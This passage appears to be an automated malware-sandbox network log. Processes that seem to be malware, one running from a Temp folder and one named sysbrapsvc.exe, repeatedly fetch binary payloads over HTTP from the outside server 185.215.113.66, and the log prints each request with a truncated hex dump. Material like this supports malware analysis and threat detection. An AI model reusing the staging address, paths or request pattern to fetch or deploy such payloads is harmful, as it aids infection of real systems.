                                                                              May 8, 2024 15:22:53.829413891 CEST1289INData Raw: cc c0 d5 f6 76 58 dc 93 86 0a 7a 73 31 1b 86 f2 99 0b 0a c3 29 1f 18 eb 34 62 30 4f 97 68 7a a7 2b e4 dc 7f 15 02 1c 92 a5 dc 04 bc d8 80 89 c1 7d 31 8d cc 5e 00 3e d9 dd 36 a0 29 2a e4 f0 03 d2 9f fb 5e 89 a7 a8 88 0c db 7f 02 b8 4c 9a 20 b8 99
                                                                              Data Ascii: vXzs1)4b0Ohz+}1^>6)*^L hJL3j104-D.0(C"krOB/Wye(m?hH/"'>X,0Yv*Mhl,]=.R~RO.qS5T{U
                                                                              May 8, 2024 15:22:53.829516888 CEST1289INData Raw: 19 89 96 e9 56 0f 9a 8c 19 b7 05 b4 27 39 21 25 b2 29 35 03 7e f7 f4 ad 75 ff 9f e3 00 20 68 f1 05 5f ae 80 44 41 3a 4f 23 2f d7 4a 79 1a 22 03 77 bd b2 c1 38 a8 21 72 fd 82 f9 23 8d bb de 86 5e 3b f3 ee 08 66 59 00 6d a4 13 79 80 f3 31 29 63 8f
                                                                              Data Ascii: V'9!%)5~u h_DA:O#/Jy"w8!r#^;fYmy1)cWz=9pHjje,]GcDOB)9l)VWdRyl}$C^dC$#nK/tmd}#x,<f7#[e|/")UN+LG.ouX$Js=
                                                                              May 8, 2024 15:22:53.829591990 CEST1289INData Raw: b0 92 f6 3f 1d 3a a3 f2 72 e7 3c ab 2a 56 d3 0e 3d 84 af 84 17 ae fe f6 bf 04 fa eb a8 21 04 10 46 12 99 06 c0 53 db bb dc 0e e4 b2 22 b6 5c 5d 9c 7b 01 fa 03 3e 6e 9b 77 dc 88 bb 7a fb a2 03 db 1e 8b 86 87 65 f2 56 a1 a8 9b f0 68 45 e3 9b 87 f2
                                                                              Data Ascii: ?:r<*V=!FS"\]{>nwzeVhES#n1KBCiD]p(Eqf$c&WhTos_49KJAZqRW'[LZE/+]RsLgQ_<OvqKKmL}:pfj^qh fW]
                                                                              May 8, 2024 15:22:54.169622898 CEST1289INData Raw: ae 13 d9 3c 80 95 1b 13 9e 3f c9 4c 70 f0 19 fc 72 a9 9d 72 9d 76 2d af 9d 78 f3 f8 ea f0 1a 30 30 f2 bc d5 d3 68 75 96 42 e1 16 bf 93 0f ed bd b7 9c 3a 47 ce 12 12 56 20 bf 54 2c 55 54 a9 64 4b e6 87 6a 07 a1 d0 67 f7 7d 50 da fd f5 9c 78 6d fc
                                                                              Data Ascii: <?Lprrv-x00huB:GV T,UTdKjg}PxmZyo!DaH,1$DSP<*J2m-Fhr&:O(d?QhBQ<Mh_)p"b,~b[KWZ5f:Gz}j[6,gXiR6
                                                                              May 8, 2024 15:23:00.527477980 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:00.867768049 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:00 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 8960
                                                                              Last-Modified: Mon, 06 May 2024 15:56:03 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638fd93-2300"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 6e 7d d2 5f ce 4a 45 f2 2e c8 0a 06 01 ad 79 a1 63 76 36 9c 33 9d 4c 75 74 4a ce 78 8a 3c ef f0 d5 e4 b0 26 52 79 67 45 ad 70 d3 3a 4b 36 01 0e c6 16 f8 71 c8 1a 6a e2 64 71 7e b1 1a b9 f6 f8 f9 38 23 3c 26 8e 19 a9 67 be 75 d4 b0 b3 ee 7e 56 8d c9 d6 b2 19 08 98 9c 62 5d 08 84 18 e0 a4 81 52 52 f1 22 2d 57 91 35 b1 be bf 00 34 54 15 7a 9f 37 5a 41 a7 67 fd f5 f0 19 bc cb 4d 5d 3b 33 55 47 d7 29 48 84 09 d2 35 61 aa 27 75 84 62 9b 91 c9 fc d8 ab f6 d3 13 57 89 3f 95 ab 64 63 e7 73 c5 5e 05 a5 42 e3 0f 60 42 17 f5 88 3b 8c 25 27 7a 85 fa 04 37 4a f5 68 71 6d 2b 8a 84 61 c2 56 01 36 4f f4 55 cc fc 6b ff 18 a6 02 24 ce 28 d3 a3 ee 8d ef d1 4b 66 64 4b 50 7b ae d7 0c db 98 be e6 d7 4d 22 0d 84 e4 73 47 48 6f f3 f6 ce cb 17 4c 5d f2 e4 99 c3 e4 ef b5 2d 3d 28 e3 2f c2 fc a5 dc 8a c6 15 02 ae 33 6c f0 40 61 05 5b 9c 9f a9 81 6f 78 43 b8 d7 ca 55 ea 3c 2d c6 35 ea e5 78 8b 82 f5 67 d9 dc eb 87 ef 5c 2a 3d 82 67 a4 20 42 ba a1 a9 6e 52 5a b2 74 d1 ff 58 7d 97 69 5f d5 2e dd 2d 9b 94 06 26 3a 55 d4 63 0c 97 [TRUNCATED]
                                                                              Data Ascii: n}_JE.ycv63LutJx<&RygEp:K6qjdq~8#<&gu~Vb]RR"-W54Tz7ZAgM];3UG)H5a'ubW?dcs^B`B;%'z7Jhqm+aV6OUk$(KfdKP{M"sGHoL]-=(/3l@a[oxCU<-5xg\*=g BnRZtX}i_.-&:UcRSTud^3n<YyiiIetwjEJIe9n[~RTz~-g eKqBga-2bgeG\Kk-M5668Gjj+N<"AY<A0PMXZdlLPVevy2lHS2>Nn<p5q7Rpet \w\3]OzWt\<7$Z/BNeoq#q4V5r0%)-`9u%:oF8Li~}WJ3VV0}4tVT[O+27Gt!rn<DI3KI=0FlLW~^'.Am~U<lab+GIJrKEf`.0t}0^"q';1q1?n=*:NOrsGDjw_Hi`DkkHjAfi\&y57v~$~H [TRUNCATED]


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.849719185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:22:56.215485096 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:22:56.561414957 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:22:56 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:22:56.561429977 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:22:56.561443090 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:22:56.561491966 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:22:56.561506987 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:22:56.561968088 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:22:56.561980963 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:22:56.561992884 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB
                                                                              May 8, 2024 15:23:03.404200077 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:03.747179031 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:03 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:23:03.747245073 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:23:03.747311115 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:23:03.747324944 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.849721185.215.113.66805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:23:02.218699932 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:02.561400890 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:02 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 8960
                                                                              Last-Modified: Mon, 06 May 2024 15:56:03 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6638fd93-2300"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 6e 7d d2 5f ce 4a 45 f2 2e c8 0a 06 01 ad 79 a1 63 76 36 9c 33 9d 4c 75 74 4a ce 78 8a 3c ef f0 d5 e4 b0 26 52 79 67 45 ad 70 d3 3a 4b 36 01 0e c6 16 f8 71 c8 1a 6a e2 64 71 7e b1 1a b9 f6 f8 f9 38 23 3c 26 8e 19 a9 67 be 75 d4 b0 b3 ee 7e 56 8d c9 d6 b2 19 08 98 9c 62 5d 08 84 18 e0 a4 81 52 52 f1 22 2d 57 91 35 b1 be bf 00 34 54 15 7a 9f 37 5a 41 a7 67 fd f5 f0 19 bc cb 4d 5d 3b 33 55 47 d7 29 48 84 09 d2 35 61 aa 27 75 84 62 9b 91 c9 fc d8 ab f6 d3 13 57 89 3f 95 ab 64 63 e7 73 c5 5e 05 a5 42 e3 0f 60 42 17 f5 88 3b 8c 25 27 7a 85 fa 04 37 4a f5 68 71 6d 2b 8a 84 61 c2 56 01 36 4f f4 55 cc fc 6b ff 18 a6 02 24 ce 28 d3 a3 ee 8d ef d1 4b 66 64 4b 50 7b ae d7 0c db 98 be e6 d7 4d 22 0d 84 e4 73 47 48 6f f3 f6 ce cb 17 4c 5d f2 e4 99 c3 e4 ef b5 2d 3d 28 e3 2f c2 fc a5 dc 8a c6 15 02 ae 33 6c f0 40 61 05 5b 9c 9f a9 81 6f 78 43 b8 d7 ca 55 ea 3c 2d c6 35 ea e5 78 8b 82 f5 67 d9 dc eb 87 ef 5c 2a 3d 82 67 a4 20 42 ba a1 a9 6e 52 5a b2 74 d1 ff 58 7d 97 69 5f d5 2e dd 2d 9b 94 06 26 3a 55 d4 63 0c 97 [TRUNCATED]
                                                                              Data Ascii: n}_JE.ycv63LutJx<&RygEp:K6qjdq~8#<&gu~Vb]RR"-W54Tz7ZAgM];3UG)H5a'ubW?dcs^B`B;%'z7Jhqm+aV6OUk$(KfdKP{M"sGHoL]-=(/3l@a[oxCU<-5xg\*=g BnRZtX}i_.-&:UcRSTud^3n<YyiiIetwjEJIe9n[~RTz~-g eKqBga-2bgeG\Kk-M5668Gjj+N<"AY<A0PMXZdlLPVevy2lHS2>Nn<p5q7Rpet \w\3]OzWt\<7$Z/BNeoq#q4V5r0%)-`9u%:oF8Li~}WJ3VV0}4tVT[O+27Gt!rn<DI3KI=0FlLW~^'.Am~U<lab+GIJrKEf`.0t}0^"q';1q1?n=*:NOrsGDjw_Hi`DkkHjAfi\&y57v~$~H [TRUNCATED]
                                                                              May 8, 2024 15:23:02.561417103 CEST1289INData Raw: f7 94 da 7b e6 b6 fe 0f a6 64 19 c2 ef 0c 25 ba 8a dc 2e e0 30 f4 54 50 75 d1 a6 f4 59 1c b4 b9 d6 5d ff c8 5e 3e 5b 07 7a 96 73 9b ae 22 d8 6b 94 c6 57 3e d8 71 a6 7b 47 b5 fd bf db f8 4c d1 a0 dc 40 6d 3e 69 9d 81 d1 0a 59 7c bc 21 67 cc 11 6c
                                                                              Data Ascii: {d%.0TPuY]^>[zs"kW>q{GL@m>iY|!gl.8D4JG?x/\@D;=(-Z!fH^;7|+$=zzC-dyfm3UW:eZP}c\i[^]:_((<E26+W]
                                                                              May 8, 2024 15:23:02.561436892 CEST1289INData Raw: 36 b6 60 d6 42 d5 be b8 10 0f 5e 53 6b 05 0c bb e0 3a fd c1 4c da c6 b2 ce 72 f2 28 ff e2 e4 db da 87 14 d0 4f 41 0e 55 57 fa be d2 25 4d 12 33 a4 70 68 6c 6c 2b a3 44 06 79 cc 95 93 eb 72 2a b2 f0 3b de cd b0 3a c3 dc 34 b8 c3 7d 7f 3e 04 b4 75
                                                                              Data Ascii: 6`B^Sk:Lr(OAUW%M3phll+Dyr*;:4}>u)xA*r\IAc:X1v".&9>^Q!4D "Ifh`(^+O1YPMZk(*x6nsclZ28_o0 k@!HuyA
                                                                              May 8, 2024 15:23:02.561450958 CEST1289INData Raw: 93 f1 1e 94 53 39 c9 d2 e2 09 21 6e 04 82 7e 50 d7 b3 b4 7a 0f 0c 6e f7 f3 72 9f 81 e7 4f 18 63 7d f3 82 53 8a c0 24 d3 f8 5f e5 bf 54 41 82 a4 fd fd 43 2d f5 13 2e c4 5b 9d f3 91 c6 f4 2e 55 bd e6 d6 75 a2 c3 d0 94 74 c8 cb 28 b6 dc f0 93 b5 29
                                                                              Data Ascii: S9!n~PznrOc}S$_TAC-.[.Uut()w~oLYj=e|qRaf;\o*FsJUS~T,om^&)Nh0/(Fy0qC4AOPp/iP?b4k"/8:V,p#$S=+
                                                                              May 8, 2024 15:23:02.561553001 CEST1289INData Raw: 33 51 0b bf 02 90 7d ae a0 4a f2 d7 4e 24 7a af 58 7f 8c 57 b1 0b ba f7 ad e3 5e a3 5c e2 17 41 70 26 55 dd e1 15 18 42 00 13 72 95 8a e6 0e bd 09 e1 cc 12 1d 94 48 d8 7f 9a a1 3a f8 a8 cd 4e 93 44 96 32 4d c1 d3 0f 72 e9 7c 3f f8 63 58 4c c1 64
                                                                              Data Ascii: 3Q}JN$zXW^\Ap&UBrH:ND2Mr|?cXLdydQ]X4&S{81eJE0]'k?mvv@Z|Bm9+7qd=Sf&x5h_VS>i2J(I-#$4V0
                                                                              May 8, 2024 15:23:02.561568022 CEST1289INData Raw: 75 f2 a4 6e 8c 81 1a ce 92 da 4e 55 fe 12 bc 9a 1d 07 16 a6 2c bb f4 14 e5 47 0e 5a ef 01 75 2d ca 7b 4a 24 d7 7f 58 3b f8 05 9d ad 36 f6 0e 9b 79 24 3d a3 86 9b 25 40 e7 93 e1 8a 71 37 ce 6a e1 85 1b d8 41 0b 62 b1 13 8e f5 76 e9 fe 55 d1 d5 ad
                                                                              Data Ascii: unNU,GZu-{J$X;6y$=%@q7jAbvU#i=a=7C(qPt]*:u0-/G3n~ulB41Q*txp{-M*u8H_8`<,d(,r*h8zG30J<W@zb
                                                                              May 8, 2024 15:23:02.561680079 CEST1289INData Raw: 22 8e fe 4a ef 62 4e fb 52 d3 10 f6 27 c8 5a 0d 9d 1d 25 85 59 6d 73 a2 2f f1 99 3c 63 a3 86 05 ed 4f 9d 19 fc 5b 79 4c 9c 5d b0 b8 13 8f c1 7b f3 b0 4b c7 c7 1a 66 c4 e8 67 59 56 e9 a8 38 19 67 57 78 8a eb f9 39 3e 92 c1 ed 14 f1 fe 1f 11 e3 ac
                                                                              Data Ascii: "JbNR'Z%Yms/<cO[yL]{KfgYV8gWx9>_tM~Q^>%\-WTTNzroS5]j9G$J,)govS8}BeW9kF,};P.2AE$!t`Gnx\pB
                                                                              May 8, 2024 15:23:02.561692953 CEST201INData Raw: 81 31 21 d8 8e 36 78 b3 2d 82 77 69 8a df 7e 62 18 45 06 17 54 88 d6 0a 13 39 f8 83 01 5f 60 e5 2f e2 a3 e1 ad 97 41 c3 f3 ff 04 87 45 be a8 6c b3 32 c4 02 f6 a3 27 6b b3 e7 12 44 a7 58 da 60 98 22 14 cc 06 3f 84 e5 8b 84 0c 98 a8 be 53 a5 2f 6a
                                                                              Data Ascii: 1!6x-wi~bET9_`/AEl2'kDX`"?S/jeUA?bkXwY;HzObN6<2%8bp2ePK1f:Kd$\kvjZz,{
                                                                              May 8, 2024 15:23:08.638293982 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:23:08.981136084 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:08 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 11520
                                                                              Last-Modified: Sat, 04 May 2024 13:18:06 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "6636358e-2d00"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4d 69 d1 66 af 90 ca ef 04 18 04 8f 9a 4f 78 79 a1 72 45 cd 89 72 d1 57 c0 33 c8 d8 28 db 5b 31 72 fa ec 98 3c 67 3f a8 16 70 92 cc 17 52 3d bb 9c 7b 03 65 25 32 e0 f5 c9 73 9d f1 c1 03 8b 8e 35 d8 88 02 5c 9e 73 f4 5b 07 c1 59 15 e9 c6 f5 e9 ef ad d9 43 18 62 a0 a9 2f 0a 3e 55 89 eb 57 0d 52 27 a6 07 3a 8b a9 bf 6c 43 a0 c6 ec 73 86 2c 9e 66 7d 06 e8 29 fd 4f 06 ba 83 84 25 5e 77 3e ad 2f e6 c8 42 af 31 8c 99 1e c4 f3 8d d4 94 d6 e0 12 42 3f ef 15 eb 39 c4 ff 0d a7 86 c6 e5 10 fc 73 6e ab 62 92 c2 cd 28 06 90 55 e6 71 50 2b 89 99 62 40 9b 39 d1 35 82 0d 31 00 b7 89 c9 29 bb 7d ec b0 ea 71 90 84 34 1d b7 73 e9 b8 4f 66 ae ce b1 f4 c6 6b 53 a3 c4 e2 b8 1a 13 69 8d 8d c5 6e 29 c8 3e 7c 53 2f 76 35 46 20 d0 37 48 e0 81 55 8c 36 e9 2e c7 17 43 32 30 71 9e 05 33 43 0d ba 30 31 91 e7 98 12 0b ba 93 dd 00 de 30 fd 0f 7c 5a 37 06 55 11 28 6f 92 5e b5 c8 f4 c0 78 2a c2 0a fd 4a 0c f8 13 b4 58 8e e9 79 4d 99 7a 1c 94 f8 12 84 db 8c 82 fd 3a 97 f0 92 23 5e 84 cb 02 45 5b 00 bb 11 d2 71 33 9b 87 c5 d8 f7 ce 18 [TRUNCATED]
